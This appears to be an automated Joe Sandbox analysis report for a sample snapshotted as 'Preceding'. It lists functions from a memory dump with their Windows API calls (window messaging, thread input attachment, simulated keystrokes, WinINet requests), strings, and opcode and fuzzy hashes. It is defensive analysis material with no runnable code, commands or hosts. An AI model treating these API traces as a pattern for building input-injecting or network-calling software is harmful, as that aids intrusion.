Opcode ID: 4274f8acc4a97e2f6324939ef02a11beaec77f3b2340d7c2e3a687e5068d83a7
Instruction ID: d0ebe79aa3dbf58f6753c8dcffc8f78ee9ea995b7c95f6ba449ca087ee025eb0
Opcode Fuzzy Hash: 4274f8acc4a97e2f6324939ef02a11beaec77f3b2340d7c2e3a687e5068d83a7
Instruction Fuzzy Hash: C921D475D50214BBCF02AFA1CC85EEEBBB8EF09300F904156B95297196CB795828DF60

Function 003144BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00314539
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 0031453C
GetWindowLongW.USER32(?,000000F0), ref: 00314563
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00314586
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 003145FE
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00314648
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00314663
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 0031467E
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00314692
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 003146AF

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: bbde63a098fba93a171625d96507c67fa7e16b71c60f0aa1eff972f918d41a1b
Instruction ID: a827ea7bb12b9a2477ca20a52ed90731b78040dcd1c35793a97b6e8c027e0b16
Opcode Fuzzy Hash: bbde63a098fba93a171625d96507c67fa7e16b71c60f0aa1eff972f918d41a1b
Instruction Fuzzy Hash: 5F617A75A00208AFDB16DFA8CC81EEE77B8EF0A714F104159FA14EB3A1C774A995DB50

Function 002EBAF6 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 002EBB18
GetForegroundWindow.USER32(00000000,?,?,?,?,?,002EABA8,?,00000001), ref: 002EBB2C
GetWindowThreadProcessId.USER32(00000000), ref: 002EBB33
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002EABA8,?,00000001), ref: 002EBB42
GetWindowThreadProcessId.USER32(?,00000000), ref: 002EBB54
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,002EABA8,?,00000001), ref: 002EBB6D
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002EABA8,?,00000001), ref: 002EBB7F
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,002EABA8,?,00000001), ref: 002EBBC4
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,002EABA8,?,00000001), ref: 002EBBD9
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,002EABA8,?,00000001), ref: 002EBBE4

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: dc90e9e90a67d253ca6dc115b946656fd810ba4af6cc03e77162b81b8393b3c6
Instruction ID: 24bf2a58c2b37d2d9c9acbd05e43970a37577bb72a0ec654ec069168e432814f
Opcode Fuzzy Hash: dc90e9e90a67d253ca6dc115b946656fd810ba4af6cc03e77162b81b8393b3c6
Instruction Fuzzy Hash: 5531BF75958309AFDB179F55DC84FABB7ADAB0931AF608019FE06C71E4C7B498808B20

Function 00282AB0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00282AF9
OleUninitialize.OLE32(?,00000000), ref: 00282B98
UnregisterHotKey.USER32(?), ref: 00282D7D
DestroyWindow.USER32(?), ref: 002C3A1B
FreeLibrary.KERNEL32(?), ref: 002C3A80
VirtualFree.KERNEL32(?,00000000,00008000), ref: 002C3AAD

Strings

close all, xrefs: 00282AF4

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 7995083aeff0a29fee7024731d384ef396a00c0e92660f2d76c917bffb32aa0f
Instruction ID: f58c4feccf24baf69637c7e87cce995df2333c24691e40e0e51d3b82874fa452
Opcode Fuzzy Hash: 7995083aeff0a29fee7024731d384ef396a00c0e92660f2d76c917bffb32aa0f
Instruction Fuzzy Hash: 66D16B35722212DFCB19EF14C485F69F7A4AF09714F1186ADE44A6B2A1CB31AD36CF40

Function 002F8835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002F89F2
SetCurrentDirectoryW.KERNEL32(?), ref: 002F8A06
GetFileAttributesW.KERNEL32(?), ref: 002F8A30
SetFileAttributesW.KERNEL32(?,00000000), ref: 002F8A4A
SetCurrentDirectoryW.KERNEL32(?), ref: 002F8A5C
SetCurrentDirectoryW.KERNEL32(?), ref: 002F8AA5
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 002F8AF5

Strings

*.*, xrefs: 002F8AAB

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 549350aea2c9143b8c9dc175825191a03cd4f6c6a3e7b2a748acc7783c21d42b
Instruction ID: 77a3b701141a52a307bf4515846bef6d5fd42d7b83bb9a6de2a0f77c21c2bb5a
Opcode Fuzzy Hash: 549350aea2c9143b8c9dc175825191a03cd4f6c6a3e7b2a748acc7783c21d42b
Instruction Fuzzy Hash: B781C1719243099BDB20EF14C444ABAF3E8FF89390F54482EF685D7250DF74D9658B92

Function 003188F9 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 193windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00318992
IsWindowEnabled.USER32(00000000), ref: 0031899E
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00318A79
SendMessageW.USER32(00000000,000000B0,?,?), ref: 00318AAC
IsDlgButtonChecked.USER32(?,00000000), ref: 00318AE4
GetWindowLongW.USER32(00000000,000000EC), ref: 00318B06
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00318B1E

Strings

(5, xrefs: 003189D5

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID: (5
API String ID: 4072528602-4024434197
Opcode ID: 4bff7085022288ca38da3cafcaac6e2afc59bdf3578f5626d01a2ad43883bf28
Instruction ID: 24f1f6407310841df04b6e8c34d233f574dfe21f5f79519bef0d3ee181603ba0
Opcode Fuzzy Hash: 4bff7085022288ca38da3cafcaac6e2afc59bdf3578f5626d01a2ad43883bf28
Instruction Fuzzy Hash: B671AF74605204AFDB2A9F54C884FFABBB9FF0E300F15445AE845672A1CB31A9D0CB59

Function 00287447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 002874D7

Part of subcall function 00287567: GetClientRect.USER32(?,?), ref: 0028758D
Part of subcall function 00287567: GetWindowRect.USER32(?,?), ref: 002875CE
Part of subcall function 00287567: ScreenToClient.USER32(?,?), ref: 002875F6

GetDC.USER32 ref: 002C6083
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 002C6096
SelectObject.GDI32(00000000,00000000), ref: 002C60A4
SelectObject.GDI32(00000000,00000000), ref: 002C60B9
ReleaseDC.USER32(?,00000000), ref: 002C60C1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 002C6152

Strings

U, xrefs: 002C6021

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 2c8938cd472ef1765ff00d35a644a7c52a54679974da7fece3b01c956d6bc098
Instruction ID: 2d01d55e82cc9576ad5eda2ecefc96754f3ae54a261b4c214af97df2789b29c1
Opcode Fuzzy Hash: 2c8938cd472ef1765ff00d35a644a7c52a54679974da7fece3b01c956d6bc098
Instruction Fuzzy Hash: 0471CF34524206DFCF269F64C888FBA7BB5FF49321F284369E9595A2A6C731C860DF50

Function 002FCC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 002FCCB7
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002FCCDF
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 002FCD0F
GetLastError.KERNEL32 ref: 002FCD67
SetEvent.KERNEL32(?), ref: 002FCD7B
InternetCloseHandle.WININET(00000000), ref: 002FCD86

Strings

, xrefs: 002FCD00

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 73d4d96e89947a56f55330a666b68cff095fc438ebff4366504407d30f8c5c89
Instruction ID: 6df3a09230dec235a0523133c4b2451847425c9da999980ae58185c5ee3f99e7
Opcode Fuzzy Hash: 73d4d96e89947a56f55330a666b68cff095fc438ebff4366504407d30f8c5c89
Instruction Fuzzy Hash: 7631717151020DAFD722AF658D88ABFBBFCEB49780F24453AF54693250DB34DD149B60

Function 002EA215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,002C55AE,?,?,Bad directive syntax error,0031DCD0,00000000,00000010,?,?), ref: 002EA236
LoadStringW.USER32(00000000,?,002C55AE,?), ref: 002EA23D

Part of subcall function 0028B329: _wcslen.LIBCMT ref: 0028B333

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 002EA301

Strings

Error: , xrefs: 002EA2CF
%s (%d) : ==> %s.: %s %s, xrefs: 002EA26B
Line %d:, xrefs: 002EA28C
., xrefs: 002EA2E7
Line %d (File "%s"):, xrefs: 002EA2A7

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: e4746c0c0f39492548c42e9f786c808b37038d74f2f0186b4db330102bc19b1f
Instruction ID: 6d10b389611c000432caf81c91b2be8aecb74bac1d5e34a673fc8d3429c88e09
Opcode Fuzzy Hash: e4746c0c0f39492548c42e9f786c808b37038d74f2f0186b4db330102bc19b1f
Instruction Fuzzy Hash: 78216F3186025AEFCF02BFA0CC0AEEE7B79BF18304F404459F515650A2EB71A628DF51

Function 002E29EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 002E29F8
GetClassNameW.USER32(00000000,?,00000100), ref: 002E2A0D
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 002E2A9A

Strings

smallicons, xrefs: 002E2A62
details, xrefs: 002E2A48
SHELLDLL_DefView, xrefs: 002E2A19
list, xrefs: 002E2A7C
largeicons, xrefs: 002E2A2E

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 02d4e65398387f67961ce7fb07d10548f3ab2b6e04091c9934d93a173510541c
Instruction ID: 61e0c6a1e9b72a366a953426644d4ca19105eb5d7239d0b0b91576fc9d910533
Opcode Fuzzy Hash: 02d4e65398387f67961ce7fb07d10548f3ab2b6e04091c9934d93a173510541c
Instruction Fuzzy Hash: A1110A762E4747FAFA167A22EC07DE637DCCF16724B600025F506F41D2FFA5A8244515

Function 00287567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0028758D
GetWindowRect.USER32(?,?), ref: 002875CE
ScreenToClient.USER32(?,?), ref: 002875F6
GetClientRect.USER32(?,?), ref: 0028773A
GetWindowRect.USER32(?,?), ref: 0028775B

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: b88c7a681de37cba33ee20ca6297d0085465983d7ba6372377699ac658a09450
Instruction ID: ac098d7b782f303c67808694b68c15e55a25de282e604ac971fe8dfb0344248a
Opcode Fuzzy Hash: b88c7a681de37cba33ee20ca6297d0085465983d7ba6372377699ac658a09450
Instruction Fuzzy Hash: FEC18D3992465AEFDB10DFA8C484BEDB7F5FF08310F24851AE899A3250D774E960DB60

Function 002BD210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 002BD237
_free.LIBCMT ref: 002BD2A2
_free.LIBCMT ref: 002BD2C8
_free.LIBCMT ref: 002BD2F1
_free.LIBCMT ref: 002BD329
_free.LIBCMT ref: 002BD35A
_free.LIBCMT ref: 002BD39B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 002BD41C
_free.LIBCMT ref: 002BD435

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: c63cbfa037f3cf7daad1d8917909e0ff583fcb57128b74be36f773a1b249520e
Instruction ID: 05e47a4d550444570e1593c42d02ee11431c1ab62616c16e769de7e2062057fa
Opcode Fuzzy Hash: c63cbfa037f3cf7daad1d8917909e0ff583fcb57128b74be36f773a1b249520e
Instruction Fuzzy Hash: CB610671A24342AFDB22AF74D8817FE7BE89F013A0F04456DED44A7293FA7598208B51

Function 002FCB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002FCBC7
GetLastError.KERNEL32 ref: 002FCBDA
SetEvent.KERNEL32(?), ref: 002FCBEE

Part of subcall function 002FCC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 002FCCB7
Part of subcall function 002FCC98: GetLastError.KERNEL32 ref: 002FCD67
Part of subcall function 002FCC98: SetEvent.KERNEL32(?), ref: 002FCD7B
Part of subcall function 002FCC98: InternetCloseHandle.WININET(00000000), ref: 002FCD86

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 555e5716f6933b38c0a3637aa28a4ab4b775f90903798271676c480378edcdfd
Instruction ID: f962113d2290272b36f7076becd03255d0808dd4d8751d5b737b09d22638e253
Opcode Fuzzy Hash: 555e5716f6933b38c0a3637aa28a4ab4b775f90903798271676c480378edcdfd
Instruction Fuzzy Hash: 5531617151070DAFDB219F61CE44AB6FBE8FF09344B24852EF65A82610C731D825EB60

Function 002E2EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 002E4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 002E43AD
Part of subcall function 002E4393: GetCurrentThreadId.KERNEL32 ref: 002E43B4
Part of subcall function 002E4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002E2F00), ref: 002E43BB

MapVirtualKeyW.USER32(00000025,00000000), ref: 002E2F0A
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 002E2F28
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 002E2F2C
MapVirtualKeyW.USER32(00000025,00000000), ref: 002E2F36
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 002E2F4E
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 002E2F52
MapVirtualKeyW.USER32(00000025,00000000), ref: 002E2F5C
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 002E2F70
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 002E2F74

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: c228066d8b380355c4055429b37aea242a33ec46da890f3a9a128d043a0c146e
Instruction ID: c5b8c5e3dbbe504f22a3cf116186d9639fb8f7016d1d9f9fd87979a1b3d6c9de
Opcode Fuzzy Hash: c228066d8b380355c4055429b37aea242a33ec46da890f3a9a128d043a0c146e
Instruction Fuzzy Hash: 0201D430794210BBFB1067699C8AF997F5EEB4EB12F504011F319AE1E4C9E264548EA9

Function 002E2150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,002E1D95,?,?,00000000), ref: 002E2159
HeapAlloc.KERNEL32(00000000,?,002E1D95,?,?,00000000), ref: 002E2160
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,002E1D95,?,?,00000000), ref: 002E2175
GetCurrentProcess.KERNEL32(?,00000000,?,002E1D95,?,?,00000000), ref: 002E217D
DuplicateHandle.KERNEL32(00000000,?,002E1D95,?,?,00000000), ref: 002E2180
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,002E1D95,?,?,00000000), ref: 002E2190
GetCurrentProcess.KERNEL32(002E1D95,00000000,?,002E1D95,?,?,00000000), ref: 002E2198
DuplicateHandle.KERNEL32(00000000,?,002E1D95,?,?,00000000), ref: 002E219B
CreateThread.KERNEL32(00000000,00000000,002E21C1,00000000,00000000,00000000), ref: 002E21B5

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: bb7ac202a852ba05e9c2af97991e1c687d5f9edbc7de018a75a678bb22d5dbd2
Instruction ID: a1709f844faa3600b80f5bed6c0a0f4c3163cdf1a284af6add85a70cb61907b0
Opcode Fuzzy Hash: bb7ac202a852ba05e9c2af97991e1c687d5f9edbc7de018a75a678bb22d5dbd2
Instruction Fuzzy Hash: A901CDB5280344BFE751AFA5DC4DFAB7BACEB89711F408421FA05DB1A1CAB49804CB30

Function 002ECE7B Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 002841EA: _wcslen.LIBCMT ref: 002841EF

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002ECF99
_wcslen.LIBCMT ref: 002ECFE0
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002ED047
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 002ED075

Strings

,*5, xrefs: 002ECF0C
0, xrefs: 002ECF5A
<*5, xrefs: 002ECEF6

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: ,*5$0$<*5
API String ID: 1227352736-381960770
Opcode ID: 96c8794b92f3cac3b71746eb7a232cc1d0c99af14f23626f73d7d94ef53c878f
Instruction ID: 73cf816ee98b6f9d8b9b2a94690ea718c77c037f0c6e9087d6583eb7a1224f02
